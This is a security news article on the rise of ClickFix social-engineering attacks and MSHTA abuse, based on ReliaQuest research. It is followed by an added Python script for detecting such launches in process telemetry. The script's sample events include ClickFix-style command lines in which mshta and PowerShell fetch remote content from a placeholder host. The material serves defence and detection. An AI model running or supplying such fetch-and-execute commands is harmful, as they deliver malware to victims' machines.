Phishing, Malware
ClickFix attacks surge as exploits see drop in popularity

Threat actors have been increasingly relying on social-engineering tactics such as ClickFix scams to lure victims into infecting their systems with malware.

Researchers with security provider ReliaQuest said that social-engineering attacks, most notably ClickFix attacks in which victims are tricked into running malicious scripts under the guise of CAPTCHA codes, now make up the majority of observed attack scams, along with techniques such as phishing emails.

“One standout trend this quarter is the widespread use of ClickFix — a social engineering technique that tricks users into pasting malicious commands into tools like PowerShell or the Windows Run prompt,” the ReliaQuest team explained.

“Disguised as a ‘solution’ to issues like fake CAPTCHAs or Windows updates, ClickFix preys on user trust and curiosity, enabling attackers to deliver malware and gain initial access with alarming ease.”

Other sources have noted a similar rise in the use of ClickFix techniques for targeted malware operations. Both private- and state-backed hacking outfits have turned to the technique as a means of evading detection by security tools and luring unwary users into compromising their own systems with malware.

According to the ReliaQuest research, threat actors took a particular liking to HTML applications from March through May. MSHTA, the Windows executable charged with running HTML apps, has exploded in popularity as an attack vector, growing from 3.1% to 33% of all defense evasion attempts in the span of a single year.

This is believed to be a byproduct of the growth in ClickFix attacks: threat actors use MSHTA code as the initial step of the malware attack chain, and unsuspecting targets are more likely to run web application code and commands.

“Threat actors take advantage of this legitimate tool by convincing users to copy and paste malicious commands into a terminal and pressing enter,” ReliaQuest said.

“MSHTA allows attackers to bypass traditional security controls designed to detect file-based delivery methods, such as phishing.”

The increasing popularity came at the expense of vulnerability exploit scripts. The researchers reckon that the ease of running ClickFix attacks, particularly the use of automated AI tools to generate the phishing email and attack code, has appealed to cybercriminals seeking an easier way to lure victims and turn mass email runs into active infections.

“External remote resources dropped from third to fourth place as attackers increasingly exploit user mistakes rather than technical vulnerabilities,” the ReliaQuest team explained.

“This shift is likely driven by the simplicity, success rate, and universal applicability of social engineering campaigns like ClickFix.”
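For defenders, the pattern described above (a user pasting a command that starts MSHTA or PowerShell with remote content) can be triaged from process-creation telemetry. The following is an added example, not code from the article or from ReliaQuest; it assumes Sysmon-style field names (`ParentImage`, `Image`, `CommandLine`), assumes Run-prompt launches show `explorer.exe` as the parent, and uses constructed events with illustrative scores and threshold.

```python
import json
import re
from pathlib import PureWindowsPath

# Interpreters the article names as ClickFix execution targets.
WATCHED = {"mshta.exe", "powershell.exe"}
# Assumption: commands typed into the Run prompt start with explorer.exe as parent.
INTERACTIVE_PARENTS = {"explorer.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def exe_name(path):
    return PureWindowsPath(path).name.lower()

def triage(event):
    """Return a finding for a watched interpreter given a remote URL, else None."""
    image = exe_name(event.get("Image", ""))
    parent = exe_name(event.get("ParentImage", ""))
    urls = URL_RE.findall(event.get("CommandLine", ""))
    if image not in WATCHED or not urls:
        return None
    # Illustrative weights: mshta with a URL is rarer in normal use than PowerShell.
    score = 2 if image == "mshta.exe" else 1
    if parent in INTERACTIVE_PARENTS:
        score += 2  # started by the logged-in user, not by a service or scheduler
    return {"image": image, "parent": parent, "urls": urls, "score": score}

def scan(lines, threshold=3):
    """Parse JSON-lines events, skip malformed lines, keep findings >= threshold."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = triage(event) if isinstance(event, dict) else None
        if finding and finding["score"] >= threshold:
            findings.append(finding)
    return findings

# Constructed sample events (not real telemetry); example.invalid is a placeholder.
FIELDS = ("ParentImage", "Image", "CommandLine")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
SAMPLE_EVENTS = [json.dumps(dict(zip(FIELDS, row))) for row in (
    (r"C:\Windows\explorer.exe", MSHTA, "mshta.exe https://example.invalid/captcha.hta"),
    (r"C:\Windows\explorer.exe", PS, 'powershell.exe -Command "Invoke-WebRequest https://example.invalid/verify"'),
    (r"C:\Windows\System32\services.exe", PS, r"powershell.exe -File C:\Ops\sync.ps1 -Uri https://example.invalid/api"),
    (r"C:\Windows\explorer.exe", MSHTA, r"mshta.exe C:\Tools\inventory.hta"),
)] + ["not json"]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

The service-launched PowerShell job and the local `.hta` file stay below the threshold, which keeps the rule focused on user-initiated launches with remote content.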